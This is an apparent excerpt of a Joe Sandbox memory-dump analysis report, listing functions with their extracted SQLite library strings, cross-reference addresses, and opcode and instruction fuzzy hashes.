SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 1D7DBD67
PRAGMA %Q.page_size, xrefs: 1D7DBD03
undersize RTree blobs in "%q_node", xrefs: 1D7DBDA1

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
API String ID: 0-3485589083
Opcode ID: 8a1c400147d33ca9dd8ac89c657f3048cc17d3a5bb7022c81ae59595e0dbca63
Instruction ID: f14bbcefbdbcd40a95a0fc6dfad5e10d62b2e3366bdeb98cd917be8ac44d1191
Opcode Fuzzy Hash: 8a1c400147d33ca9dd8ac89c657f3048cc17d3a5bb7022c81ae59595e0dbca63
Instruction Fuzzy Hash: 6C31E6B1904711EFD3008B24DC84B7677B8FB453AAF01426AF94996212D736E954CFB3

Function 1D8332F0 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 464COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D8336C7, 1D83370C, 1D83376C, 1D83381D
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D8336B8, 1D8336FD, 1D83375D, 1D83380E
database corruption, xrefs: 1D8336C2, 1D833707, 1D833767, 1D833818

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: b80c1e09083fd4cd533d8fce82ff9fc32bfc75b4791566c7d5c3622dc9acded0
Instruction ID: c4c12fbcff17eba9a876848c6a063d2a9be83c8054c8c30979e2218233d0c5f1
Opcode Fuzzy Hash: b80c1e09083fd4cd533d8fce82ff9fc32bfc75b4791566c7d5c3622dc9acded0
Instruction Fuzzy Hash: 74F11474608651AFD300DF28D880BA6BBF0FF45256F4482A9E94C8B352E735F955CBE2

Function 1D75E420 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 380COMMON

Download Yara Rule

Strings

unknown error, xrefs: 1D75E76B
%c%04d-%02d-%02d %02d:%02d:%06.3f, xrefs: 1D75E717
abort due to ROLLBACK, xrefs: 1D75E795
d, xrefs: 1D75E71D
another row available, xrefs: 1D75E7A3, 1D75E7AE
no more rows available, xrefs: 1D75E79C

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %c%04d-%02d-%02d %02d:%02d:%06.3f$abort due to ROLLBACK$another row available$d$no more rows available$unknown error
API String ID: 0-322231948
Opcode ID: 658b08da27a00357e71b9b6aa6e127c347e57151dd867846f13b08b911e8bc34
Instruction ID: 1e4de3edcc2af1ad5697082fe9fc396d3864bb2a26abdc036ab75bd7cf31a279
Opcode Fuzzy Hash: 658b08da27a00357e71b9b6aa6e127c347e57151dd867846f13b08b911e8bc34
Instruction Fuzzy Hash: 1FE1CF716083409BD700CF24C888B6BB7E5BF89324F508D6EF98997251E776E945CB93

Function 1D7628E5 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 346COMMON

Download Yara Rule

Strings

INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1D7629F1
unable to validate the inverted index for FTS5 table %s.%s: %s, xrefs: 1D762AA0
malformed inverted index for FTS5 table %s.%s, xrefs: 1D762A8A

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS5 table %s.%s$unable to validate the inverted index for FTS5 table %s.%s: %s
API String ID: 0-3572959941
Opcode ID: 4e2954930bef86bd81090d263ab0712b5477e54ebd4e12221077de1898139419
Instruction ID: b4eae0002e9d903e2cf32701c82545a98a7402d2b089e10a369713bd694961d4
Opcode Fuzzy Hash: 4e2954930bef86bd81090d263ab0712b5477e54ebd4e12221077de1898139419
Instruction Fuzzy Hash: 9941E671909221AFE3109F24DCC8FA777B8EF462A5F14022AFD4586211E7359654CFB7

Function 1D7800A0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 334COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D780113, 1D78026B, 1D780416, 1D780441
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D780104, 1D78025C, 1D780407, 1D780432
database corruption, xrefs: 1D78010E, 1D780266, 1D780411, 1D78043C

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 9e3064ac3974d7689fb439b938f161ea6c859233a8b818e5196013bea536676b
Instruction ID: 4164e0c7336fb20bbe3d9e71cb2468192d4885478a72e3a5b890a1a2eedebab2
Opcode Fuzzy Hash: 9e3064ac3974d7689fb439b938f161ea6c859233a8b818e5196013bea536676b
Instruction Fuzzy Hash: 14B11A75A083609FC305CF19D8805ABFBE0EFC4215F4946AEF5899B243E235E549CBA3

Function 1D78CEA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 286COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D78CF57, 1D78CF87, 1D78D0A7, 1D78D130
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D78CF48, 1D78CF78, 1D78D098, 1D78D121
database corruption, xrefs: 1D78CF52, 1D78CF82, 1D78D0A2, 1D78D12B

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: b0cab5808183c23c33e2d3e7a1d81a66cfc626b137499801e8e1feced30754e2
Instruction ID: 6882a14ec6cad10536061a494c3478553d4c233bb7e86fce23f99998336c0adf
Opcode Fuzzy Hash: b0cab5808183c23c33e2d3e7a1d81a66cfc626b137499801e8e1feced30754e2
Instruction Fuzzy Hash: 2C91183160C2956FC304EE2DE8905FABBD0EB95225F9445BFF9D887283E129D509C7A3

Function 1D749700 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

(FK), xrefs: 1D7498D3

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: (FK)
API String ID: 0-1642768157
Opcode ID: 3093d856b918401c2f0dbe56f76a7579aab1a088a60777cfd31740bdda6679ac
Instruction ID: 4afdf8bb03320c2706d3264e7d099dca7ae352d7239c3a9d4f9cd501a1ad513a
Opcode Fuzzy Hash: 3093d856b918401c2f0dbe56f76a7579aab1a088a60777cfd31740bdda6679ac
Instruction Fuzzy Hash: 4481C5B67092009FD7019F28EC40B66F3A1FF85236F21876FE64A876A1E732E550D752

Function 1D8C8D80 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 271COMMON

Download Yara Rule

Strings

%s-shm, xrefs: 1D8C8DF2
winOpenShm, xrefs: 1D8C8FB9
readonly_shm, xrefs: 1D8C8F52

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s-shm$readonly_shm$winOpenShm
API String ID: 0-2815843928
Opcode ID: 97b2668d9c951efae7c9caafd31f6e9d056735f8ec8e56229e2b8f451f66e555
Instruction ID: 3237b7323ff12e915930d7ff16b9b1b609a84469ec11b7629fc9221941371bad
Opcode Fuzzy Hash: 97b2668d9c951efae7c9caafd31f6e9d056735f8ec8e56229e2b8f451f66e555
Instruction Fuzzy Hash: 0391DCB0918311EBDB109F24DC84BA777B8FB013A5F054269FD459B251EB39E918CBA3

Function 1D75EB00 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 187COMMON

Download Yara Rule

Strings

%.*s%s, xrefs: 1D75EC88
%s at line %d of [%.10s], xrefs: 1D75ECDA
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D75ECCB
database corruption, xrefs: 1D75ECD5

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %.*s%s$%s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-894757972
Opcode ID: 7078cb8a68e23bd2ec029b602761169878eb91db9d8514a4feefb1690a620896
Instruction ID: cf83f0c32dc3320f426e9d55cfa5d6f73e9c7ce5908b5f2e6d0c9063a7419ee6
Opcode Fuzzy Hash: 7078cb8a68e23bd2ec029b602761169878eb91db9d8514a4feefb1690a620896
Instruction Fuzzy Hash: EA61F4B5A083419FD714CF18C880AABB7E2BF84724F058D6EE8599B351E731E945CB93

Function 1D7E9030 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 169COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D7E905E, 1D7E9191, 1D7E91C8, 1D7E91F3
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7E904F, 1D7E9182, 1D7E91B9, 1D7E91E4
database corruption, xrefs: 1D7E9059, 1D7E918C, 1D7E91C3, 1D7E91EE

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: c1d0e4948b5e59f4197724b43424b28442281790dde098dd1e2c24ac3a2d7248
Instruction ID: 2735d46f0a2ed2b429f72d609ee8976d17445b3e80fb6f363e9d9f450cfdb13f
Opcode Fuzzy Hash: c1d0e4948b5e59f4197724b43424b28442281790dde098dd1e2c24ac3a2d7248
Instruction Fuzzy Hash: ED51E276304250ABC300EF18DC84AB7B7E0EBC8265F95886EF589C7652E375E5858763

Function 1D739DA0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

[%!g,%!g]], xrefs: 1D739EC0
[%!g,%!g],, xrefs: 1D739E7E

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: [%!g,%!g],$[%!g,%!g]]
API String ID: 0-3388633204
Opcode ID: 69e178751777e398ebc402bd035c5df9b54ef74199865fca9e40c8981b68e5ec
Instruction ID: e86042d1e3fdcca8370f22d5860e4f24a3371b2719c1a3c2157855856007c472
Opcode Fuzzy Hash: 69e178751777e398ebc402bd035c5df9b54ef74199865fca9e40c8981b68e5ec
Instruction Fuzzy Hash: A1513670904702ABD700DF29DCC4B6BB7B4BF42362F00466EF8499B252E775A585CBA3

Function 1D75F330 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1D75F33F
unable to validate the inverted index for FTS%d table %s.%s: %s, xrefs: 1D75F418
malformed inverted index for FTS%d table %s.%s, xrefs: 1D75F3F3

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS%d table %s.%s$unable to validate the inverted index for FTS%d table %s.%s: %s
API String ID: 0-2809892521
Opcode ID: f762ee03d29d209513785b2a7acdfe36a852a20a25df333e644c3dee0bbaba09
Instruction ID: 1f8678d974bafd16c6efbd60b1934a98687968ebba5083566ee72469504d0257
Opcode Fuzzy Hash: f762ee03d29d209513785b2a7acdfe36a852a20a25df333e644c3dee0bbaba09
Instruction Fuzzy Hash: BE41F472909221EFE7109B24EC88B6B7778EF422A5F04466AFC05C6211D735A155CFB3

Function 1D766E30 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 30COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D766E62
API call with %s database connection pointer, xrefs: 1D766E4C
%s at line %d of [%.10s], xrefs: 1D766E67
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D766E58
invalid, xrefs: 1D766E47

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse
API String ID: 0-3670841456
Opcode ID: a67ec748fa271b560ca4a2e4f601642186ab1022196414254ab4d53c98bcb47f
Instruction ID: b23b3cd7b22830f17affdb11fe565ea5ae381fb9ae9ded5f963738bbff08cb50
Opcode Fuzzy Hash: a67ec748fa271b560ca4a2e4f601642186ab1022196414254ab4d53c98bcb47f
Instruction Fuzzy Hash: 48F0A738A44584EBFB04A508DD81BFE3B563BC0B1AFD040DEEA545F197E21A5443D253

Function 1D766EB0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 29COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D766EE5
API call with %s database connection pointer, xrefs: 1D766ECF
%s at line %d of [%.10s], xrefs: 1D766EEA
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D766EDB
invalid, xrefs: 1D766ECA

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
